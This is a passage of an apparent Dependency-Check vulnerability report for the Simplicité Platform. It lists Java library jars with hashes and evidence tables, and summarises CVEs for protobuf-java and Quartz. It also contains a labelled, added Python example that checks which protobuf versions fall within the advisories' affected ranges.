SHA1: 632e27a101f7d8f0feae5024b14ac00e7a91698f
SHA256: 673fabfb4a0d699b22ad2d92c3de0fe325748ad1602ea2d77dc35e1136a7d2af
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-cloud-firestore-v1beta1 High Vendor jar package name firestore Highest Vendor jar package name firestore Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name v1beta1 Highest Vendor jar package name v1beta1 Low Vendor pom artifactid proto-google-cloud-firestore-v1beta1 Highest Vendor pom artifactid proto-google-cloud-firestore-v1beta1 Low Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-cloud-firestore-v1beta1 High Vendor pom parent-artifactid google-api-grpc Low Product file name proto-google-cloud-firestore-v1beta1 High Product jar package name firestore Highest Product jar package name firestore Low Product jar package name google Highest Product jar package name v1beta1 Highest Product jar package name v1beta1 Low Product pom artifactid proto-google-cloud-firestore-v1beta1 Highest Product pom groupid com.google.api.grpc Highest Product pom name proto-google-cloud-firestore-v1beta1 High Product pom parent-artifactid google-api-grpc Medium Version file version 0.62.0 High Version pom version 0.62.0 Highest
proto-google-cloud-pubsub-v1-1.73.0.jar
Description: PROTO library for proto-google-cloud-pubsub-v1
File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-cloud-pubsub-v1/1.73.0/proto-google-cloud-pubsub-v1-1.73.0.jar
MD5: 36c54e399c2fdcdd7c4057832e81bbe1
SHA1: 81e98f12b862cb8702a65d9603248b2bbbeb3ef7
SHA256: eddd39520e620515b9e62890f4bdd512f75bacc9ec13e3ed58a7d147ec85f06e
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-cloud-pubsub-v1 High Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name pubsub Highest Vendor jar package name pubsub Low Vendor jar package name v1 Highest Vendor jar package name v1 Low Vendor pom artifactid proto-google-cloud-pubsub-v1 Highest Vendor pom artifactid proto-google-cloud-pubsub-v1 Low Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-cloud-pubsub-v1 High Vendor pom parent-artifactid google-api-grpc Low Product file name proto-google-cloud-pubsub-v1 High Product jar package name google Highest Product jar package name pubsub Highest Product jar package name pubsub Low Product jar package name v1 Highest Product jar package name v1 Low Product pom artifactid proto-google-cloud-pubsub-v1 Highest Product pom groupid com.google.api.grpc Highest Product pom name proto-google-cloud-pubsub-v1 High Product pom parent-artifactid google-api-grpc Medium Version file version 1.73.0 High Version pom parent-version 1.73.0 Low Version pom version 1.73.0 Highest
proto-google-common-protos-1.16.0.jar
Description: Google Cloud Common Protos for Java
License: Apache: https://github.com/googleapis/common-protos-java/blob/master/LICENSE
File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-common-protos/1.16.0/proto-google-common-protos-1.16.0.jar
MD5: e60d9ae5f85493ee06f1fe91c884e8c9
SHA1: 2c5f022ea3b8e8df6a619c4cd8faf9af86022daa
SHA256: e6eff21b0a5cc049b0bf2c571fac23abe8dd9d5f9143189f501c04164dc37da2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-common-protos High Vendor jar package name api Highest Vendor jar package name api Low Vendor jar package name cloud Highest Vendor jar package name google Highest Vendor jar package name google Low Vendor pom artifactid proto-google-common-protos Highest Vendor pom artifactid proto-google-common-protos Low Vendor pom developer email googleapis@googlegroups.com Low Vendor pom developer id GoogleAPIs Medium Vendor pom developer name GoogleAPIs Medium Vendor pom developer org Google LLC Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid com.google.api.grpc Highest Vendor pom name Google Cloud Common Protos for Java High Vendor pom url googleapis/common-protos-java Highest Product file name proto-google-common-protos High Product jar package name api Highest Product jar package name api Low Product jar package name cloud Highest Product jar package name google Highest Product pom artifactid proto-google-common-protos Highest Product pom developer email googleapis@googlegroups.com Low Product pom developer id GoogleAPIs Low Product pom developer name GoogleAPIs Low Product pom developer org Google LLC Low Product pom developer org URL https://www.google.com Low Product pom groupid com.google.api.grpc Highest Product pom name Google Cloud Common Protos for Java High Product pom url googleapis/common-protos-java High Version file version 1.16.0 High Version pom version 1.16.0 Highest
proto-google-iam-v1-0.12.0.jar
Description: PROTO library for proto-google-iam-v1
License: Apache-2.0: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-iam-v1/0.12.0/proto-google-iam-v1-0.12.0.jar
MD5: 2adb121a4d06c28cf1669f904832e041
SHA1: ea312c0250a5d0a7cdd1b20bc2c3259938b79855
SHA256: ddabb48fe072ada50484c98f00893a3e1356b4f05d2d0bf0045bc830145d1e0c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-iam-v1 High Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name iam Highest Vendor jar package name iam Low Vendor jar package name v1 Highest Vendor jar package name v1 Low Vendor pom artifactid proto-google-iam-v1 Highest Vendor pom artifactid proto-google-iam-v1 Low Vendor pom developer email andrealin@google.com Low Vendor pom developer email garrettjones@google.com Low Vendor pom developer email hzyi@google.com Low Vendor pom developer email michaelbausor@google.com Low Vendor pom developer email neowu@google.co Low Vendor pom developer email pongad@google.com Low Vendor pom developer email vam@google.com Low Vendor pom developer id andreamlin Medium Vendor pom developer id garrettjonesgoogle Medium Vendor pom developer id hzyi-google Medium Vendor pom developer id michaelbausor Medium Vendor pom developer id neozwu Medium Vendor pom developer id pongad Medium Vendor pom developer id vam-google Medium Vendor pom developer name Andrea Lin Medium Vendor pom developer name Garrett Jones Medium Vendor pom developer name Hanzhen Yi Medium Vendor pom developer name Michael Darakananda Medium Vendor pom developer name Micheal Bausor Medium Vendor pom developer name Neo Wu Medium Vendor pom developer name Vadym Matsishevskyi Medium Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-iam-v1 High Vendor pom organization name Google LLC High Vendor pom url googleapis/api-client-staging Highest Product file name proto-google-iam-v1 High Product jar package name google Highest Product jar package name iam Highest Product jar package name iam Low Product jar package name v1 Highest Product jar package name v1 Low Product pom artifactid proto-google-iam-v1 Highest Product pom developer email andrealin@google.com Low Product pom developer email garrettjones@google.com Low Product pom developer email hzyi@google.com Low Product pom developer email michaelbausor@google.com Low Product pom developer email neowu@google.co Low Product pom developer email pongad@google.com Low Product pom developer email vam@google.com Low Product pom developer id andreamlin Low Product pom developer id garrettjonesgoogle Low Product pom developer id hzyi-google Low Product pom developer id michaelbausor Low Product pom developer id neozwu Low Product pom developer id pongad Low Product pom developer id vam-google Low Product pom developer name Andrea Lin Low Product pom developer name Garrett Jones Low Product pom developer name Hanzhen Yi Low Product pom developer name Michael Darakananda Low Product pom developer name Micheal Bausor Low Product pom developer name Neo Wu Low Product pom developer name Vadym Matsishevskyi Low Product pom groupid com.google.api.grpc Highest Product pom name proto-google-iam-v1 High Product pom organization name Google LLC Low Product pom url googleapis/api-client-staging High Version file version 0.12.0 High Version pom version 0.12.0 Highest
protobuf-java-3.10.0.jar
Description: Core Protocol Buffers library. Protocol Buffers are a way of encoding structured data in an efficient yet extensible format.
License: https://opensource.org/licenses/BSD-3-Clause
File Path: /var/simplicite/.m2/repository/com/google/protobuf/protobuf-java/3.10.0/protobuf-java-3.10.0.jar
MD5: ee4e91af9399c52cdad88bd078f5a71a
SHA1: 410b61dd0088aab4caa05739558d43df248958c9
SHA256: 161d7d61a8cb3970891c299578702fd079646e032329d6c2cabf998d191437c9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name protobuf-java High Vendor jar package name google Highest Vendor jar package name protobuf Highest Vendor Manifest automatic-module-name com.google.protobuf Medium Vendor Manifest bundle-docurl https://developers.google.com/protocol-buffers/ Low Vendor Manifest bundle-symbolicname com.google.protobuf Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid protobuf-java Highest Vendor pom artifactid protobuf-java Low Vendor pom groupid com.google.protobuf Highest Vendor pom name Protocol Buffers [Core] High Vendor pom parent-artifactid protobuf-parent Low Product file name protobuf-java High Product jar package name google Highest Product jar package name protobuf Highest Product Manifest automatic-module-name com.google.protobuf Medium Product Manifest bundle-docurl https://developers.google.com/protocol-buffers/ Low Product Manifest Bundle-Name Protocol Buffers [Core] Medium Product Manifest bundle-symbolicname com.google.protobuf Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid protobuf-java Highest Product pom groupid com.google.protobuf Highest Product pom name Protocol Buffers [Core] High Product pom parent-artifactid protobuf-parent Medium Version file version 3.10.0 High Version Manifest Bundle-Version 3.10.0 High Version pom version 3.10.0 Highest
CVE-2022-3171
A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields cause objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above. NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-3509 (OSSINDEX)
A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields cause objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above. CWE-20 Improper Input Validation
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.google.protobuf:protobuf-java:3.10.0:*:*:*:*:*:*:*
CVE-2022-3510 (OSSINDEX)
A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields cause objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-3510 for details CWE-noinfo
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.google.protobuf:protobuf-java:3.10.0:*:*:*:*:*:*:*
CVE-2021-22569
An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions. NVD-CWE-noinfo
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
protobuf-java-util-3.10.0.jar
Description: Utilities for Protocol Buffers
License: https://opensource.org/licenses/BSD-3-Clause
File Path: /var/simplicite/.m2/repository/com/google/protobuf/protobuf-java-util/3.10.0/protobuf-java-util-3.10.0.jar
MD5: 2e87271cc08f426faf26f474f7308a74
SHA1: a68c906db83e93babbb4024ce91e7441bb7598dd
SHA256: 619b0b0dc344cb141e493cbedc5687c8fb7c985e609a1b035e621bfab2f89021
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name protobuf-java-util High Vendor jar package name google Highest Vendor jar package name protobuf Highest Vendor jar package name util Highest Vendor Manifest automatic-module-name com.google.protobuf.util Medium Vendor Manifest bundle-docurl https://developers.google.com/protocol-buffers/ Low Vendor Manifest bundle-symbolicname com.google.protobuf.util Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid protobuf-java-util Highest Vendor pom artifactid protobuf-java-util Low Vendor pom groupid com.google.protobuf Highest Vendor pom name Protocol Buffers [Util] High Vendor pom parent-artifactid protobuf-parent Low Product file name protobuf-java-util High Product jar package name google Highest Product jar package name protobuf Highest Product jar package name util Highest Product Manifest automatic-module-name com.google.protobuf.util Medium Product Manifest bundle-docurl https://developers.google.com/protocol-buffers/ Low Product Manifest Bundle-Name Protocol Buffers [Util] Medium Product Manifest bundle-symbolicname com.google.protobuf.util Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid protobuf-java-util Highest Product pom groupid com.google.protobuf Highest Product pom name Protocol Buffers [Util] High Product pom parent-artifactid protobuf-parent Medium Version file version 3.10.0 High Version Manifest Bundle-Version 3.10.0 High Version pom version 3.10.0 Highest
CVE-2022-3171
A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields cause objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above. NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-22569
An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions. NVD-CWE-noinfo
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
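The protobuf-java-3.10.0.jar and protobuf-java-util-3.10.0.jar findings above quote the same fixed releases, 3.21.7, 3.20.3, 3.19.6 and 3.16.3, one per maintained branch. Reading such a list is where triage most often goes wrong: 3.18.2 is above 3.16.3 yet remains affected, because the 3.18 line never received the fix, while 3.19.6 is fixed despite being below 3.21.7. The script below is an added example, not code from this report, from Simplicité or from the protobuf project. The branch rule it applies (a version is fixed only at or above the fix on its own major.minor branch, or at or above the newest listed fix) is this example's interpretation of the advisory wording, and the versions it triages are a constructed sample.

```python
"""Multi-branch fixed-version check for advisories phrased "prior to X, Y, Z".

Added example, not from the Dependency-Check report, Simplicite or the protobuf
project.  The branch rule is an interpretation of the advisory wording: a
version is fixed only if it is at or above the fix on its own major.minor
branch, or at or above the newest listed fix; minor lines with no backport
(3.17.x, 3.18.x here) stay affected.
"""
from __future__ import annotations

from typing import Iterable, Optional

# Fixed releases quoted in the CVE-2022-3171 / CVE-2022-3509 / CVE-2022-3510 text.
PROTOBUF_JAVA_FIXES: tuple[str, ...] = ("3.21.7", "3.20.3", "3.19.6", "3.16.3")


def parse_version(text: str) -> tuple[int, int, int, int]:
    """'3.10.0' -> (3, 10, 0, 0).  Missing components are padded with zeros; a
    pre-release suffix ('3.21.7-rc1') yields a trailing -1 so that it sorts
    strictly below the final release it precedes."""
    core, _, suffix = text.strip().partition("-")
    parts = [int(p) for p in core.split(".")]
    if not 1 <= len(parts) <= 3:
        raise ValueError(f"unsupported version string: {text!r}")
    parts += [0] * (3 - len(parts))
    parts.append(-1 if suffix else 0)
    return tuple(parts)  # type: ignore[return-value]


def is_affected(version: str, fixes: Iterable[str] = PROTOBUF_JAVA_FIXES) -> bool:
    """True when `version` falls inside the advisory's affected ranges."""
    v = parse_version(version)
    fixed = [parse_version(f) for f in fixes]
    if v >= max(fixed):
        return False  # at or beyond the newest fix: every later line is clean
    # Fixed only if on the same major.minor branch as a backported fix and at/above it.
    return not any(v[:2] == f[:2] and v >= f for f in fixed)


def smallest_fix(version: str, fixes: Iterable[str] = PROTOBUF_JAVA_FIXES) -> Optional[str]:
    """The least upgrade that clears the finding, or None when not affected."""
    fixes = tuple(fixes)
    if not is_affected(version, fixes):
        return None
    v = parse_version(version)
    return min((f for f in fixes if parse_version(f) > v), key=parse_version)


def triage(versions: Iterable[str], fixes: Iterable[str] = PROTOBUF_JAVA_FIXES) -> dict[str, Optional[str]]:
    """Map each version to the smallest fix it needs (None = not affected)."""
    fixes = tuple(fixes)
    return {ver: smallest_fix(ver, fixes) for ver in versions}


if __name__ == "__main__":
    # Constructed sample: the scanned 3.10.0 plus versions on each side of every branch fix.
    sample = ["3.10.0", "3.16.2", "3.16.3", "3.18.2", "3.19.5", "3.19.6",
              "3.20.2", "3.21.7-rc1", "3.21.7", "3.22.0"]
    for ver, fix in triage(sample).items():
        status = f"affected, upgrade to {fix}" if fix else "not affected"
        print(f"{ver:<12} {status}")
```

Run as a script it prints the triage table for the sample; `is_affected()` and `smallest_fix()` are the parts to reuse when checking a lock file or SBOM against any advisory worded the same way. For the jar in this report the answer is the unsurprising one (3.10.0 is affected and the nearest listed fix is 3.16.3), but the same function also shows why a jump to 3.18.x would not close the finding.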
proton-j-0.33.4.jar
Description: Proton is a library for speaking AMQP.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/qpid/proton-j/0.33.4/proton-j-0.33.4.jar
MD5: 1e03613999e16d99dfd735c7ae5befba
SHA1: ae78c5552b1ed6549fc5b51f9739e8dbd921ffc3
SHA256: 1d2bd1955536d9762229ad9e7e4d63baf2388095841a3839ba723241f201b838
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proton-j High Vendor jar package name apache Highest Vendor jar package name proton Highest Vendor jar package name qpid Highest Vendor Manifest automatic-module-name org.apache.qpid.proton.j Medium Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.qpid.proton-j Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid proton-j Highest Vendor pom artifactid proton-j Low Vendor pom groupid org.apache.qpid Highest Vendor pom name Proton-J High Vendor pom parent-artifactid proton-j-parent Low Product file name proton-j High Product jar package name amqp Highest Product jar package name apache Highest Product jar package name proton Highest Product jar package name qpid Highest Product Manifest automatic-module-name org.apache.qpid.proton.j Medium Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Proton-J Medium Product Manifest bundle-symbolicname org.apache.qpid.proton-j Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid proton-j Highest Product pom groupid org.apache.qpid Highest Product pom name Proton-J High Product pom parent-artifactid proton-j-parent Medium Version file version 0.33.4 High Version Manifest Bundle-Version 0.33.4 High Version pom version 0.33.4 Highest
qpid-jms-client-0.51.0.jar
Description: The core JMS Client implementation
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/qpid/qpid-jms-client/0.51.0/qpid-jms-client-0.51.0.jar
MD5: 479f5e93eaa0a76d031cdc092cd525a1
SHA1: 45201d940dca87f04823bfdf39d6aae9b4a145f4
SHA256: 272e82564f995120816c5b5fab98cc1d9e195fbddc2a3a4be115a2e45b114767
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name qpid-jms-client High Vendor jar package name apache Highest Vendor jar package name jms Highest Vendor jar package name qpid Highest Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.qpid.jms.client Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid qpid-jms-client Highest Vendor pom artifactid qpid-jms-client Low Vendor pom groupid org.apache.qpid Highest Vendor pom name QpidJMS Client High Vendor pom parent-artifactid qpid-jms-parent Low Product file name qpid-jms-client High Product jar package name apache Highest Product jar package name jms Highest Product jar package name qpid Highest Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name QpidJMS Client Medium Product Manifest bundle-symbolicname org.apache.qpid.jms.client Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid qpid-jms-client Highest Product pom groupid org.apache.qpid Highest Product pom name QpidJMS Client High Product pom parent-artifactid qpid-jms-parent Medium Version file version 0.51.0 High Version Manifest Bundle-Version 0.51.0 High Version pom version 0.51.0 Highest
qrgen-1.4.jar
Description: a simple QRCode generation api for java built on top of ZXING
License: Apache License v2: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /var/simplicite/.m2/repository/net/glxn/qrgen/1.4/qrgen-1.4.jar
MD5: 22aedd5cea2b5d4edc650ab1e08a1ff9
SHA1: fbb2465ec16db786a164e66f2a1e67e2e9254303
SHA256: 4985f423c0ced38a1b60ac0f2b76e9a260fe54a276ed313c362ae85fdbe39c35
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name qrgen High Vendor jar package name glxn Highest Vendor jar package name glxn Low Vendor jar package name net Highest Vendor jar package name net Low Vendor jar package name qrcode Highest Vendor jar package name qrgen Highest Vendor jar package name qrgen Low Vendor pom artifactid qrgen Highest Vendor pom artifactid qrgen Low Vendor pom developer email ken@glxn.net Low Vendor pom developer name Ken Gullaksen Medium Vendor pom groupid net.glxn Highest Vendor pom name QRGen High Vendor pom url http://kenglxn.github.io/QRGen/ Highest Product file name qrgen High Product jar package name glxn Highest Product jar package name glxn Low Product jar package name net Highest Product jar package name qrcode Highest Product jar package name qrgen Highest Product jar package name qrgen Low Product pom artifactid qrgen Highest Product pom developer email ken@glxn.net Low Product pom developer name Ken Gullaksen Low Product pom groupid net.glxn Highest Product pom name QRGen High Product pom url http://kenglxn.github.io/QRGen/ Medium Version file version 1.4 High Version pom version 1.4 Highest
quartz-2.3.1.jar
Description: Enterprise Job Scheduler
License: Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/quartz-scheduler/quartz/2.3.1/quartz-2.3.1.jar
MD5: be3926e0e2d77e84f9f6a1bba18d2b49
SHA1: 8d4e9a8191092402e77a7d1edb5bbfd8b212186c
SHA256: 7b1e8d8a093ab2d102645397e200bdae7989f69f3e3df93c5e372ab00759ff46
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name quartz High Vendor hint analyzer vendor softwareag Highest Vendor jar package name job Highest Vendor jar package name quartz Highest Vendor jar package name scheduler Highest Vendor Manifest bundle-docurl http://www.terracotta.org Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Vendor Manifest bundle-symbolicname org.quartz-scheduler.quartz Medium Vendor Manifest terracotta-name quartz Medium Vendor Manifest terracotta-projectstatus Supported Low Vendor pom artifactid quartz Highest Vendor pom artifactid quartz Low Vendor pom groupid org.quartz-scheduler Highest Vendor pom name quartz High Vendor pom parent-artifactid quartz-parent Low Product file name quartz High Product jar package name job Highest Product jar package name quartz Highest Product jar package name scheduler Highest Product jar package name terracotta Highest Product Manifest bundle-docurl http://www.terracotta.org Low Product Manifest Bundle-Name quartz Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Product Manifest bundle-symbolicname org.quartz-scheduler.quartz Medium Product Manifest terracotta-name quartz Medium Product Manifest terracotta-projectstatus Supported Low Product pom artifactid quartz Highest Product pom groupid org.quartz-scheduler Highest Product pom name quartz High Product pom parent-artifactid quartz-parent Medium Version file version 2.3.1 High Version Manifest Bundle-Version 2.3.1 High Version pom version 2.3.1 Highest
CVE-2019-13990
initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-39017
quartz-jobs 2.3.2 and below was discovered to contain a code injection vulnerability in the component org.quartz.jobs.ee.jms.SendQueueMessageJob.execute. This vulnerability is exploited via passing an unchecked argument. NOTE: this is disputed by multiple parties because it is not plausible that untrusted user input would reach the code location where injection must occur.
CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
relaxng-datatype-2.3.2.jar
File Path: /var/simplicite/.m2/repository/com/sun/xml/bind/external/relaxng-datatype/2.3.2/relaxng-datatype-2.3.2.jar
MD5: 0ebc89465bebcaedb3d97ed959b45fa8
SHA1: d202e2c8bdd0a5286490260e311f0df1955f4dbf
SHA256: 6a746e2e38eb08b755e1a6b1badc3ab99c1fce81159c1687974da868714a82f5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name relaxng-datatype High Vendor jar package name datatype Highest Vendor jar package name rngdatatype Low Vendor jar package name sun Highest Vendor jar package name sun Low Vendor jar package name tools Low Vendor jar (hint) package name oracle Highest Vendor jar (hint) package name oracle Low Vendor pom artifactid relaxng-datatype Highest Vendor pom artifactid relaxng-datatype Low Vendor pom groupid com.sun.xml.bind.external Highest Vendor pom name RelaxNG Datatype High Vendor pom parent-artifactid jaxb-external-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name relaxng-datatype High Product jar package name datatype Highest Product jar package name helpers Low Product jar package name rngdatatype Low Product jar package name sun Highest Product jar package name tools Low Product pom artifactid relaxng-datatype Highest Product pom groupid com.sun.xml.bind.external Highest Product pom name RelaxNG Datatype High Product pom parent-artifactid jaxb-external-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version pom version 2.3.2 Highest
rhino-1.7.13.jar
Description:
Rhino is an open-source implementation of JavaScript written entirely in Java.
It is typically embedded into Java applications to provide scripting to end users.
License:
Mozilla Public License, Version 2.0: http://www.mozilla.org/MPL/2.0/index.txt
File Path: /var/simplicite/.m2/repository/org/mozilla/rhino/1.7.13/rhino-1.7.13.jar
MD5: 17d7bed97d9c03a77578ec16e26bfc2f
SHA1: e6b2e12dc79fbdc58d8bf62a583705a551ec37d6
SHA256: 931dda33789d8e004ff5b5478ee3d6d224305de330c48266df7c3e49d52fc606
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name rhino High Vendor jar package name javascript Highest Vendor jar package name mozilla Highest Vendor Manifest built-date 2020-09-02 Low Vendor Manifest built-time 11:53:29 Low Vendor Manifest bundle-symbolicname org.mozilla.rhino Medium Vendor Manifest implementation-url http://www.mozilla.org/rhino Low Vendor Manifest Implementation-Vendor Mozilla Foundation High Vendor pom artifactid rhino Highest Vendor pom artifactid rhino Low Vendor pom groupid org.mozilla Highest Vendor pom organization name The Mozilla Foundation High Vendor pom organization url http://www.mozilla.org Medium Vendor pom url https://developer.mozilla.org/en/Rhino Highest Product file name rhino High Product jar package name javascript Highest Product jar package name mozilla Highest Product Manifest built-date 2020-09-02 Low Product Manifest built-time 11:53:29 Low Product Manifest bundle-symbolicname org.mozilla.rhino Medium Product Manifest Implementation-Title Mozilla Rhino High Product Manifest implementation-url http://www.mozilla.org/rhino Low Product pom artifactid rhino Highest Product pom groupid org.mozilla Highest Product pom organization name The Mozilla Foundation Low Product pom organization url http://www.mozilla.org Low Product pom url https://developer.mozilla.org/en/Rhino Medium Version file version 1.7.13 High Version Manifest Bundle-Version 1.7.13 High Version Manifest Implementation-Version 1.7.13 High Version pom version 1.7.13 Highest
rhino-1.7.13.jar: test.js
File Path: /var/simplicite/.m2/repository/org/mozilla/rhino/1.7.13/rhino-1.7.13.jar/org/mozilla/javascript/tools/debugger/test.js
MD5: 3f4137118304ccd25816067cf8d1edd6
SHA1: d3c7ae4c10cb6c7ac191cb65a39e53ba6a4e6cfb
SHA256: 950d2db0a646488500b58ba76a02c33501a048708c083e3b743b73b16e105331
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence
rhino-js-engine-1.7.10.jar
Description:
A js-engine.jar that provides a script engine "rhino" with old Rhino JavaScript.
The source code for js-engine comes from https://java.net/projects/Scripting.
The Rhino engine itself is pulled by maven. Its source is at https://github.com/mozilla/rhino.
License:
The BSD 3-Clause License: https://opensource.org/licenses/BSD-3-Clause
File Path: /var/simplicite/.m2/repository/cat/inspiracio/rhino-js-engine/1.7.10/rhino-js-engine-1.7.10.jar
MD5: 5543d39bea21e5c9515e8d967a61e1b1
SHA1: 09cc9336acf7bd2f370ae812d5713e90463edc33
SHA256: b47d73c223c86fd3f70470a9a8269626dbb6e9cb0195d062ba53171a2df7ff44
Referenced In Project/Scope: Simplicite Platform:compile
